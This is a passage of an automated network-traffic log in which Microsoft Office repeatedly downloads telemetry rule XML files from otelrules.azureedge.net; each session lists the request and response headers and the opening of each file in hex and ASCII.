                                                                                                                                      2024-11-29 22:11:41 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      114192.168.2.44986813.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:41 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:41 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1395
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                      ETag: "0x8DC582BE017CAD3"
                                                                                                                                      x-ms-request-id: 37388cc4-c01e-00ad-4fef-41a2b9000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221141Z-174f7845968px8v7hC1EWR08ng00000010p000000000qk5b
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:41 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      115192.168.2.44986913.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:42 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:42 UTC495INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:42 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1358
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                      ETag: "0x8DC582BE6431446"
                                                                                                                                      x-ms-request-id: 2191e2ce-a01e-003d-63ab-4298d7000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221142Z-174f7845968n2hr8hC1EWR9cag000000103g00000000h0zs
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:42 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      116192.168.2.44987013.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:42 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:42 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1395
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                      ETag: "0x8DC582BDE12A98D"
                                                                                                                                      x-ms-request-id: 9fc3e736-101e-0046-4391-3f91b0000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221142Z-174f7845968ljs8phC1EWRe6en00000010bg00000000cqyg
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:43 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      117192.168.2.44987113.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:43 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:43 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1358
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                      ETag: "0x8DC582BE022ECC5"
                                                                                                                                      x-ms-request-id: 3452a663-f01e-003c-1f91-3f8cf0000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221143Z-174f7845968kdththC1EWRzvxn0000000csg00000000nx35
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:43 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      118192.168.2.44987213.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:43 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:44 UTC495INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:43 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1389
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                      ETag: "0x8DC582BE10A6BC1"
                                                                                                                                      x-ms-request-id: 26f9b3b7-001e-008d-64ab-42d91e000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221143Z-174f7845968cpnpfhC1EWR3afc000000103g00000000fwvc
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:44 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      119192.168.2.44987313.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:44 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:49 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:49 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1352
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                      ETag: "0x8DC582BE9DEEE28"
                                                                                                                                      x-ms-request-id: ee9d1ea0-001e-00a2-4791-3fd4d5000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221148Z-174f7845968cpnpfhC1EWR3afc000000105g0000000098p1
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:49 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      120192.168.2.44987413.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:44 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:45 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1405
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                      ETag: "0x8DC582BE12B5C71"
                                                                                                                                      x-ms-request-id: fdde8523-d01e-0028-578c-3f7896000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221145Z-174f78459685m244hC1EWRgp2c000000108000000000pc90
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:45 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      121192.168.2.44987513.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:45 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:45 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1368
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                      ETag: "0x8DC582BDDC22447"
                                                                                                                                      x-ms-request-id: e3ba4dff-401e-002a-1ea2-42c62e000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221145Z-174f7845968pf68xhC1EWRr4h800000010u0000000007ew7
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:45 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      122192.168.2.44986513.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:45 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:46 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:45 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1356
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                      ETag: "0x8DC582BDC681E17"
                                                                                                                                      x-ms-request-id: af2f76df-f01e-0096-4850-4110ef000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221145Z-174f7845968swgbqhC1EWRmnb400000010tg000000000vpr
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:46 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      123192.168.2.44987613.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:45 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:46 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:46 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1401
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                      ETag: "0x8DC582BE055B528"
                                                                                                                                      x-ms-request-id: f1905457-c01e-0066-4580-3fa1ec000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221146Z-174f7845968swgbqhC1EWRmnb400000010n000000000feue
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
